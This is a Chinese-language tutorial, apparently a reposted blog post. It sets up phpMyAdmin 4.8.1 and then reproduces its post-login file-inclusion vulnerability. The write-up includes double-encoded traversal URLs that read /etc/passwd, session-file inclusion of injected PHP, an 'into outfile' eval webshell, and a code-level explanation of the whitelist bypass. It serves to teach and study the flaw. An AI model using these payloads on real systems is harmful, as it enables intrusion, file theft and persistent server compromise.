一.phpMyAdmin環境配置
PS:前面兩部分內容會簡單講解phpMyAdmin 4.8.1版本配置過程,如果讀者只想了解漏洞,可以從第三部分開始閱讀。還請見諒~
phpMyAdmin是一種MySQL數據庫的管理工具,安裝該工具後,即可通過Web形式直接管理MySQL數據,而不需要通過執行系統命令來管理,非常適合對數據庫操作命令不熟悉的數據庫管理者,下面詳細說明該工具的安裝方法。
第一步,下載phpMyAdmin 4.8.1。
第二步,配置環境。
打開libraries目錄下的config.default.php文件,依次找到下面各項,按照說明配置即可。
修改MySQL的用戶名和密碼,phpMyAdmin使用MySQL默認用戶名root,密碼設置為「123456」。
/**
* MySQL user
*
* @global string $cfg['Servers'][$i]['user']
*/
$cfg['Servers'][$i]['user'] = 'root';
/**
* MySQL password (only needed with 'config' auth_type)
*
* @global string $cfg['Servers'][$i]['password']
*/
$cfg['Servers'][$i]['password'] = '123456';
認證方法設置為「cookie」,登錄phpMyAdmin時需要用戶名和密碼進行驗證。在此有cookie、http、signon、config四種模式可供選擇。
/**
* Authentication method (valid choices: config, http, signon or cookie)
*
* @global string $cfg['Servers'][$i]['auth_type']
*/
$cfg['Servers'][$i]['auth_type'] = 'cookie';
第三步,運行WAMP軟件,並將WAMP中phpMyAdmin替換成4.8.1版本。
替換如下圖所示:
運行Apache和MySQL如下圖所示。
問題1: 當我們輸入用戶名「root」、密碼「123456」時,很可能會報錯「mysqli_real_connect(): (HY000/1045): Access denied for user 『root』@『localhost』 (using password: YES)」。提示是錯誤1045,告訴我們錯誤是由於沒有訪問權限,所以訪問被拒絕了,主要原因就是由於該用戶名所對應的密碼錯誤。
第四步,檢查配置文件中的主機、用戶名和密碼,並確認這些信息與 MySQL 服務器管理員所給出的信息一致。設置controluser和controlpass。
/**
* MySQL control user settings (this user must have read-only
* access to the "mysql/user" and "mysql/db" tables). The controluser is also
* used for all relational features (pmadb)
*
* @global string $cfg['Servers'][$i]['controluser']
*/
$cfg['Servers'][$i]['controluser'] = 'root';
/**
* MySQL control user settings (this user must have read-only
* access to the "mysql/user" and "mysql/db" tables). The controluser is also
* used for all relational features (pmadb)
*
* @global string $cfg['Servers'][$i]['controlpass']
*/
$cfg['Servers'][$i]['controlpass'] = '123456';
第五步,修改「config.sample.inc.php」(或config.inc.php)文件內容。
設置controluser和controlpass值。
修改如下:
$cfg['Servers'][$i]['controluser'] = 'root';
$cfg['Servers'][$i]['controlpass'] = '123456';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '123456';
第六步,接着登錄phpMyAdmin,輸入「root」和「123456」之後進入數據庫管理主界面。
二.phpMyAdmin基礎用法
接着我們使用phpMyAdmin搭建一個簡單的網站試試。
第一步,創建數據庫。
第二步,創建數據表 student,點擊執行。
第三步,設置表的字段,包括:id、username、password。
第四步,查看我們創建好的數據表student。
第五步,插入數據並查詢。
INSERT INTO `student`(`id`, `username`, `password`) VALUES ('1', 'yangxiuzhang','6666666');
INSERT INTO `student`(`id`, `username`, `password`) VALUES ('2', 'Eastmountain','123456');
此時數據顯示如下圖所示:
第六步,編寫PHP代碼將我們數據庫中的內容顯示出來。
訪問地址:
http://localhost:8088/20200110.php
<?php
echo('<h2>數據庫測試</h2>');
//鏈接數據庫
$con = mysqli_connect("localhost", "root", "123456", "eastmount");
if (!$con)
{
die('Could not connect database: ' . mysqli_error());
}
//設置查詢結果編碼
$con->set_charset('utf8');
//查詢學生信息
$sql = "SELECT * FROM `student` ";
//得到查詢結果
$result = $con->query($sql);
//遍歷結果
while($row = $result->fetch_array()){
list($id,$username, $password) = $row;
echo $id.' ';
echo $username.' ';
echo $password;
echo '<br >';
}
//關閉連接
$con->close();
?>
顯示結果如下圖所示:
如果需要查看配置信息,這使用「phpinfo()」函數實現。
<?php
phpinfo();
?>顯示結果如下圖所示,PHP的配置信息。
寫到這裡,我們的環境已經搭建成功,接下來我們開始講解phpMyAdmin漏洞吧。可能很多博友會疑惑,為什麼前面花費這麼多時間講解環境搭建了,兩個原因吧!一方面作者是從零開始學習,通過環境搭建來複現該漏洞;另一方面照顧初學者,希望通過通俗易懂的步驟能實現文章的實驗,也希望安全圈的大牛們別笑,哈哈~都是一點一滴成長起來的。
三.phpMyAdmin漏洞復現
原因:phpMyadmin 4.8.1版本的index.php中存在文件包含漏洞,通過二次編碼可繞過過濾。
第一步,根據該版本CVE漏洞構造URL,在index.php後添加內容,如顯示/etc/passwd詳細內容。
/* 方法一 */
http://localhost:8088/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
/* 方法二 */
http://localhost:8088/phpmyadmin/index.php?target=db_datadict.php%253f/../../../../../../../../../Windows/DATE.ini
第二步,通過目錄穿越包含任意文件。
第三步,執行SQL語句查詢數據庫路徑。結果為:C:xamppmysqldata。
show global variables like "%datadir%";
第四步,向數據庫寫入php代碼。創建數據庫rce和表rce,並插入php代碼。
CREATE DATABASE rce;
use rce;
CREATE TABLE rce(code varchar(100));
INSERT INTO rce(code) VALUES("<?php phpinfo(); ?>");
輸出結果如下圖所示:
然後我們可以看到插入的php代碼,如下所示。
第五步,在SQL中執行select 『<?php phpinfo() ?>』,然後查看當前頁面cookie中的phpmyadmin的值。
通過瀏覽器查看網絡的Cookie值。
第六步,構建包含Session值的URL路徑。
F12查看網站Session值,訪問/index.php?target=db_sql.php%253f/…/…/…/…/…/…/tmp/sess_[session]。
?target=db_datadict.php%253f/../../../../../../../../../phpStudy/PHPTutorial/tmp/tmp/sess_imnnv91q886sfboa2sqos02b7njvho24
訪問能顯示如下圖所示的信息:
第七步,在phpInfo默認頁面找到網站的安裝位置:/var/www/html,然後寫入一句話木馬。
select '<?php @eval($_POST[hcl]) ?>' into outfile '/var/www/html/hcl.php'
第八步,通過菜刀連接 http://ip/hcl.php。菜刀連接成功,在根目錄下找到了key.txt文件,查看key.txt文件,獲得key值。
簡單總結:
利用phpMyAdmin 4.8.1後台文件包含漏洞,獲取登錄phpmyadmin系統所產生的sess_sessionID文件,然後通過文件繞過獲取相關信息並植入木馬,最終獲取webshell。通常linux系統中存放路徑為/tmp/sess_[當前會話session值]。
四.漏洞原理
在phpMyAdmin 4.8.1版本的index.php文件中,第50-63行代碼如下:
$target_blacklist = array (
'import.php', 'export.php'
);
// If we have a valid target, let's load that script instead
if (! empty($_REQUEST['target'])
&& is_string($_REQUEST['target'])
&& ! preg_match('/^index/', $_REQUEST['target'])
&& ! in_array($_REQUEST['target'], $target_blacklist)
&& Core::checkPageValidity($_REQUEST['target'])
) {
include $_REQUEST['target'];
exit;
}
它的含義是:
target傳入不能為空
target必須是一個字符串
target不能以index開頭
target不能在數組target_blacklist中
target經過checkPageValidit檢查後為真
前面三個大家都容易理解,第四個判斷是黑名單判斷。在index.php中已經定義好了target_blacklist的值,它們是import.php和export.php,只要不等於這兩個值就可以。
再看第五個判斷,Core::checkPageValidity($_REQUEST[『target』]為真,通過全局搜索發現了代碼在librariesclassesCore.php文件的第443-476行。
public static function checkPageValidity(&$page, array $whitelist = [])
{
if (empty($whitelist)) {
$whitelist = self::$goto_whitelist;
}
if (! isset($page) || !is_string($page)) {
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
return false;
}
在checkPageValidit中有兩個形參,第一個是傳入的target,第二個whitelist則有默認形參,也就是空的數組。進入函數首先會判斷whitelist是否為空,如果為空則將定義的goto_whitelist賦值給whitelist(因為確實為空,我們只傳進去一個target)。接着我們來看看goto_whitelist的代碼。
public static $goto_whitelist = array(
'db_datadict.php',
'db_sql.php',
'db_events.php',
'db_export.php',
'db_importdocsql.php',
'db_multi_table_query.php',
'db_structure.php',
'db_import.php',
'db_operations.php',
'db_search.php',
'db_routines.php',
'export.php',
'import.php',
'index.php',
'pdf_pages.php',
'pdf_schema.php',
'server_binlog.php',
'server_collations.php',
'server_databases.php',
'server_engines.php',
'server_export.php',
'server_import.php',
'server_privileges.php',
'server_sql.php',
'server_status.php',
'server_status_advisor.php',
'server_status_monitor.php',
'server_status_queries.php',
'server_status_variables.php',
'server_variables.php',
'sql.php',
'tbl_addfield.php',
'tbl_change.php',
'tbl_create.php',
'tbl_import.php',
'tbl_indexes.php',
'tbl_sql.php',
'tbl_export.php',
'tbl_operations.php',
'tbl_structure.php',
'tbl_relation.php',
'tbl_replace.php',
'tbl_row_action.php',
'tbl_select.php',
'tbl_zoom_select.php',
'transformation_overview.php',
'transformation_wrapper.php',
'user_password.php',
);
接着分析代碼,如果page在白名單中就會直接return true,但這裡考慮到了可能帶參數的情況,所以有了下面的判斷。
下圖的代碼中,mb_strpos函數是查找string在另一個string中首次出現的位置。_page變量是獲取page問號前的內容,是考慮到target有參數的情況,只要_page在白名單中就直接return true。但還考慮了url編碼的情況,所以如果這步判斷未成功,下一步又進行url解碼。
當傳入二次編碼後的內容,會讓checkPageValidity()這個函數返回true,但index中實際包含的內容卻不是白名單中的文件。
例如:傳入「?target=db_datadict.php%253f 」,由於服務器會自動解碼一次,所以在checkPageValidity()中,page的值一開始會是「db_datadict.php%3f」,又一次url解碼後變成了「db_datadict.php?」,這時符合了?前內容在白名單的要求,函數返回true。
但在index.php中_REQUEST[『target』]仍然是「db_datadict.php%3f」,而且會被include,通過目錄穿越,就可造成任意文件包含。最終通過該漏洞實現了上述攻擊,這個漏洞也很快被修復並發佈新版本。
五.總結
寫到這裡,這篇基礎性文章就此結束,希望文章對您有所幫助。本文利用phpMyAdmin 4.8.1後台文件包含漏洞,獲取登錄phpmyadmin系統所產生的sess_sessionID文件,然後通過文件繞過獲取相關信息並植入木馬,最終獲取webshell。同時,此漏洞是登陸後才可以使用的,比較雞肋。一般登陸後直接執行SQL語句生成shell即可,但有時目錄權限比較嚴格,不能在WEB目錄內生成,則可以結合本例使用。
原創文章,作者:投稿專員,如若轉載,請註明出處:https://www.506064.com/zh-hk/n/255851.html
微信掃一掃 
支付寶掃一掃 